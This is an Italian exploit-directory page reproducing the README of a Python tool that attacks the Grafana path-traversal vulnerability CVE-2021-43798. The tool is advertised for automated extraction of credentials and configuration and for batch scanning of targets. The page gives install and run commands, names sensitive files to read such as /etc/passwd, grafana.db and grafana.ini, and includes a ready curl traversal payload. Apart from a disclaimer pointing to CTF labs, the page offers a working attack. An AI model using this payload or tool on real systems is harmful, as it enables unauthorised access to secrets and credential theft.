Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
-Grafana-LFI-CVE-2021-43798 — 📂 Grafana LFI Exploit (CVE-2021-43798). Estrazione automatizzata di credenziali e configurazione. 🕵️ | Kitploit
Strumenti/GitHubGitHub/kikechans/-grafana-lfi-cve-2021-43798
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniCTFPenetration Testing
GitHubkikechans/-grafana-lfi-cve-2021-43798

-Grafana-LFI-CVE-2021-43798

📂 Grafana LFI Exploit (CVE-2021-43798). Estrazione automatizzata di credenziali e configurazione. 🕵️

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 mesi faNon ancora revisionato

🚀 Grafana LFI Exploit (CVE-2021-43798)

Script di automazione in Python 3 per sfruttare la vulnerabilità di Local File Inclusion (LFI) in Grafana (versioni dalla 8.0.0 alla 8.3.0). Questo exploit consente di eseguire un directory traversal per leggere file sensibili del sistema operativo senza autenticazione. ✨ Caratteristiche

root@kitploit:~
Compatibilità Python 3.10+: Patchato per funzionare con versioni moderne di Python (correzione di collections.Mapping).

Scansione in Lotto: Capacità di elaborare più obiettivi tramite un file targets.txt.

Decifratura dei Dati: Include moduli per la gestione di sessioni e dati cifrati di Grafana.

Ottimizzato per CTF: Output pulito e diretto, ideale per laboratori come HackTheBox e TryHackMe.

🛠️ Requisiti e Installazione

A causa delle dipendenze da librerie datate, si consiglia di installare i seguenti pacchetti: Bash

pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages

root@kitploit:~
Nota: Se usi Python 3.10 o superiore, lo script include una patch automatica per la compatibilità con collections.abc.

🚀 Utilizzo

root@kitploit:~
Configurare gli obiettivi: Aggiungi gli URL (con porta) nel file targets.txt.
Bash

echo "http://10.129.234.47:3000" > targets.txt

Eseguire l'exploit:
Bash

python3 exploit.py

🎯 Obiettivi comuni di lettura (LFI)

Una volta eseguito, puoi provare a leggere file critici come:

root@kitploit:~
/etc/passwd (Utenti di sistema)

/var/lib/grafana/grafana.db (Database con hash degli utenti)

/etc/grafana/grafana.ini (Configurazione e segreti)

💡 Metodo Alternativo (Manuale)

Se preferisci non usare lo script, puoi sfruttare l'LFI direttamente via curl: Bash

curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

⚠️ Disclaimer

Questo repository è stato creato esclusivamente a scopo educativo e per l'uso in ambienti controllati (CTF, laboratori). L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento. 🏷️ Topic (Tag)

grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal

Scarica lo strumento